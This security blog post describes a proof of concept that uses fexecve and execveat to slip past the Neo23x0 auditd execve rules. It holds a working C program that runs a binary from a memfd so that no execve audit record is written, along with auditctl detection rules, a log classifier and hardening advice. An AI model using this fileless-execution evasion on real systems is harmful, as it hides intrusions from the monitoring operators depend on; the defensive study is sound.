Security researcher Milad Cheraghi has published a proof of concept (PoC) showing how `fexecve` can bypass the Neo23x0 auditd configuration for process-execution monitoring. `fexecve` is a glibc library function, not a syscall of its own: on Linux it executes a file through `execveat(2)` with an empty path and `AT_EMPTY_PATH`, so audit rules that only hook `execve(2)` never record the execution.
The Neo23x0 auditd ruleset is widely used to track security-critical activity on Linux systems, in particular process execution via the `execve` syscall. `fexecve`, which executes a binary from an already open file descriptor instead of from a path, gives an attacker a quieter alternative: neither the path watches (`-w <path> -p x`) nor the `-S execve` rules fire, so the execution leaves no process-execution record in the audit log.
You Should Know:
1. Understanding `fexecve` vs. `execve`
- `execve(path, argv, envp)`: takes a pathname. Neo23x0's `-S execve` rules and its `-w <path> -p x` watches both log it.
- `fexecve(fd, argv, envp)`: takes an already open file descriptor, so there is no pathname to watch. It is a glibc function, not a syscall: on kernels 3.19 and later glibc issues `execveat(fd, "", argv, envp, AT_EMPTY_PATH)`, which an `-S execve` rule never sees. (On older kernels glibc falls back to `execve()` on `/proc/self/fd/N`, which an `-S execve` rule does catch.)
2. PoC Execution Steps
Clone the PoC repository:
git clone https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config.git
cd bypass-Neo23x0-auditd-config
Compile and run the bypass:
gcc fexecve_bypass.c -o fexecve_bypass
./fexecve_bypass /path/to/malicious_binary
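The mechanism behind the PoC, as an added example written for this post rather than the code in the repository above: it copies /bin/sh (a harmless stand-in for an attacker's binary) into an anonymous memfd and runs it with fexecve(3). The names load_payload, run_from_fd and demo_fd_exec and the memfd name not_a_path are this example's own; it assumes a Linux host with /bin/sh, and falls back to an unlinked temporary file if memfd_create(2) is unavailable.

```c
// Added example, not the PoC from the repository above: run a binary from a
// file descriptor with fexecve(3). On Linux, glibc implements fexecve() as
// execveat(fd, "", argv, envp, AT_EMPTY_PATH), so an audit rule that hooks
// only -S execve never records the execution; a -S execveat rule does.
// Assumptions: Linux, /bin/sh present (used as a harmless payload), and
// memfd_create(2) available (kernel >= 3.17); otherwise it falls back to an
// unlinked temporary file, which fexecve() runs just the same.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Copy everything readable from src to dst. Returns 0 on success, -1 on error. */
static int copy_fd(int src, int dst)
{
    char buf[65536];
    ssize_t n;
    while ((n = read(src, buf, sizeof buf)) > 0) {
        for (ssize_t off = 0; off < n; ) {
            ssize_t w = write(dst, buf + off, (size_t)(n - off));
            if (w < 0) return -1;
            off += w;
        }
    }
    return n < 0 ? -1 : 0;
}

/* Load the file at `path` into a descriptor that has no usable pathname: an
 * anonymous memfd when available, otherwise an unlinked temp file. Nothing on
 * this fd is set close-on-exec: fexecve() of a "#!" script needs the fd to
 * survive the exec (the interpreter is handed /dev/fd/N); an ELF does not care. */
int load_payload(const char *path, const char *memfd_name)
{
    int src = open(path, O_RDONLY | O_CLOEXEC);
    if (src < 0) return -1;
    /* raw syscall rather than the memfd_create() wrapper so this builds on glibc < 2.27 */
    int fd = (int)syscall(SYS_memfd_create, memfd_name, 0);
    if (fd >= 0) {
        if (copy_fd(src, fd) < 0) { close(fd); fd = -1; }
    } else {
        /* Fallback: write, close the write handle (the kernel refuses to exec a
         * file that is open for writing, ETXTBSY), reopen read-only, unlink. */
        char tmpl[] = "/tmp/payload.XXXXXX";
        int w = mkstemp(tmpl);
        if (w >= 0) {
            int ok = copy_fd(src, w) == 0 && fchmod(w, 0700) == 0;
            close(w);
            if (ok) fd = open(tmpl, O_RDONLY);
            unlink(tmpl);
        }
    }
    close(src);
    return fd;
}

/* Fork and fexecve() the descriptor in the child. Returns the child's exit
 * status, 127 if the exec itself failed, -1 on a fork/wait error. */
int run_from_fd(int fd, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        fexecve(fd, argv, environ);   /* returns only on failure */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demonstration: copy /bin/sh into the pathless fd and run `sh -c "exit 42"`
 * from it; returns 42 when the payload ran. While the child runs, its
 * /proc/<pid>/exe reads "/memfd:not_a_path (deleted)" and no execve record exists. */
int demo_fd_exec(void)
{
    int fd = load_payload("/bin/sh", "not_a_path");
    if (fd < 0) return -1;
    char *argv[] = { "sh", "-c", "exit 42", NULL };
    int rc = run_from_fd(fd, argv);
    close(fd);
    return rc;
}

int main(void)
{
    int rc = demo_fd_exec();
    printf("payload exit status: %d (%s)\n", rc,
           rc == 42 ? "executed from fd, no execve record" : "failed");
    return rc == 42 ? 0 : 1;
}
```

Compile it with gcc and run it on a host with the Neo23x0 rules loaded: `ausearch -sc execve` finds no record for the child, whereas `ausearch -sc execveat` does once a rule on that syscall is added.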
3. Detecting `fexecve` Bypass Attempts
Add an auditd rule for `execveat`, the syscall `fexecve` actually issues (there is no syscall named `fexecve`, so `auditctl -S fexecve` is rejected with "Syscall name unknown"); add the matching `-F arch=b32` rule if 32-bit binaries can run on the host:
sudo auditctl -a always,exit -F arch=b64 -S execveat -k fexecve_exec
Verify logs (`-i` prints the syscall name instead of its number):
sudo ausearch -i -k fexecve_exec
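A key search only works once the rule exists; to find fd-based execs in raw audit logs that were captured with a broader exec rule, the classifier below (an added example for this post, not part of the PoC repository or of auditd) maps the arch= and syscall= fields of SYSCALL records to execve or execveat using the kernel's per-ABI syscall numbers. The sample records are constructed, and classify_exec and execveat_fd are this example's own names.

```c
// Added example, not from the page or the PoC repository: classify raw auditd
// SYSCALL records so an exec that went through execveat(2), which is what
// glibc's fexecve() issues, is not mistaken for (or lost among) execve(2)
// events. Syscall numbers are the kernel's per-ABI tables; the sample records
// are constructed for this example and mirror the fields auditd writes.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum exec_kind { NOT_EXEC = 0, EXEC_EXECVE = 1, EXEC_EXECVEAT = 2 };

/* audit "arch=" value and the execve/execveat numbers of that ABI */
static const struct { const char *arch; long execve_nr, execveat_nr; } ARCHES[] = {
    { "c000003e",  59, 322 },   /* x86_64  */
    { "40000003",  11, 358 },   /* i386    */
    { "c00000b7", 221, 281 },   /* aarch64 */
};

/* Copy the value of `key` (a whole-token key=value, quoted or bare) into out.
 * Returns 1 if the key is present, 0 otherwise. */
static int get_field(const char *rec, const char *key, char *out, size_t outlen)
{
    size_t klen = strlen(key);
    for (const char *p = rec; (p = strstr(p, key)) != NULL; p += klen) {
        if ((p == rec || p[-1] == ' ') && p[klen] == '=') {
            const char *v = p + klen + 1;
            int quoted = (*v == '"');
            if (quoted) v++;
            size_t n = 0;
            while (v[n] && v[n] != (quoted ? '"' : ' ') && n + 1 < outlen) n++;
            memcpy(out, v, n);
            out[n] = '\0';
            return 1;
        }
    }
    return 0;
}

/* Classify one raw audit line; only type=SYSCALL records can be execs. */
enum exec_kind classify_exec(const char *rec)
{
    char type[16], arch[16], nr[16];
    if (!get_field(rec, "type", type, sizeof type) || strcmp(type, "SYSCALL") != 0)
        return NOT_EXEC;
    if (!get_field(rec, "arch", arch, sizeof arch) || !get_field(rec, "syscall", nr, sizeof nr))
        return NOT_EXEC;
    long n = strtol(nr, NULL, 10);
    for (size_t i = 0; i < sizeof ARCHES / sizeof ARCHES[0]; i++) {
        if (strcmp(arch, ARCHES[i].arch) != 0) continue;
        if (n == ARCHES[i].execve_nr)   return EXEC_EXECVE;
        if (n == ARCHES[i].execveat_nr) return EXEC_EXECVEAT;
    }
    return NOT_EXEC;
}

/* For an execveat record, a0 (hex) is the descriptor it was given. fexecve()
 * passes the file's own fd with an empty pathname; a1 is only a pointer in the
 * SYSCALL record, so what was executed has to be read from the PATH record with
 * the same serial (in the constructed sample, the memfd's /memfd: name).
 * Returns -1 when the record is not an execveat. */
long execveat_fd(const char *rec)
{
    char a0[24];
    if (classify_exec(rec) != EXEC_EXECVEAT || !get_field(rec, "a0", a0, sizeof a0))
        return -1;
    return strtol(a0, NULL, 16);
}

/* Constructed sample records (not captured from a real system). */
static const char *SAMPLES[] = {
    "type=SYSCALL msg=audit(1625097600.123:455): arch=c000003e syscall=59 success=yes exit=0 "
    "a0=55d0c3f2a2a0 a1=55d0c3f2b0c0 a2=55d0c3f2c0e0 a3=8 items=2 ppid=1234 pid=5677 auid=1000 "
    "uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 key=\"process_exec\"",
    "type=SYSCALL msg=audit(1625097600.123:456): arch=c000003e syscall=322 success=yes exit=0 "
    "a0=3 a1=7ffd1234 a2=7ffd5678 a3=7ffd9abc items=2 ppid=1234 pid=5678 auid=1000 "
    "uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 key=\"process_exec\"",
    "type=PATH msg=audit(1625097600.123:456): item=0 name=\"/memfd:not_a_path (deleted)\" "
    "inode=1337 dev=00:01 mode=0100777 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL",
};

int main(void)
{
    for (size_t i = 0; i < sizeof SAMPLES / sizeof SAMPLES[0]; i++) {
        enum exec_kind k = classify_exec(SAMPLES[i]);
        if (k == EXEC_EXECVEAT)
            printf("record %zu: execveat via fd %ld (fexecve-style exec)\n", i, execveat_fd(SAMPLES[i]));
        else if (k == EXEC_EXECVE)
            printf("record %zu: plain execve\n", i);
        else
            printf("record %zu: not an exec syscall record\n", i);
    }
    return 0;
}
```

The same classification is what `ausearch -i` does when it prints `syscall=execveat`; doing it in code is useful when the logs are shipped raw to a SIEM that only knows the numbers.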
4. Mitigation Strategies
- Update auditd rules: cover `execveat` alongside `execve`, for both `b64` and `b32`.
- Use eBPF/LSM hooks: hook the exec path itself (for example the `bprm_check_security` LSM hook or the `sched_process_exec` tracepoint), which fires for every exec regardless of which syscall requested it.
- Enable Sysmon for Linux or another eBPF-based process-creation sensor, and re-run the PoC to confirm it records fd-based execs.
5. Key Commands for Analysis
Check loaded audit rules:
sudo auditctl -l
Monitor active processes:
ps aux | grep -i "suspicious_process"
Inspect file descriptors and the executable a process was started from (a memfd-backed binary shows up as `/memfd:<name> (deleted)`):
ls -la /proc/<PID>/fd
ls -l /proc/<PID>/exe
What Undercode Say
The `fexecve` bypass highlights a gap in traditional auditd configurations. While `execve` is heavily monitored, its sibling `execveat` (which `fexecve` and memfd-based in-memory loaders rely on) often is not, and attackers increasingly reach for such less-monitored syscalls. Defenders must:
– Expand syscall coverage in audit rules.
– Implement behavioral detection (e.g., anomalous process execution chains).
– Leverage kernel security modules like SELinux/AppArmor.
Relevant Commands for Hardening:
- Restrict fd-based exec via seccomp: the filter must name `execveat`, since `fexecve` has no syscall of its own, and should only be deployed after confirming no legitimate software on the host uses it. For a systemd service, for example:
SystemCallFilter=~execveat
- Audit all exec-related syscalls:
sudo auditctl -a always,exit -F arch=b64 -S execve -S execveat -k process_exec
Expected Output (illustrative raw record; `a0=3` is the descriptor handed to `fexecve`, `a1` is the address of its empty path string, and `ausearch -i` would print `syscall=execveat` instead of the number):
type=SYSCALL msg=audit(1625097600.123:456): arch=c000003e syscall=322 success=yes exit=0 a0=3 a1=7ffd1234 a2=7ffd5678 a3=0 items=2 ppid=1234 pid=5678 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 key="process_exec"
Reported By: Miladcheraghi Bypassing – Hackers Feeds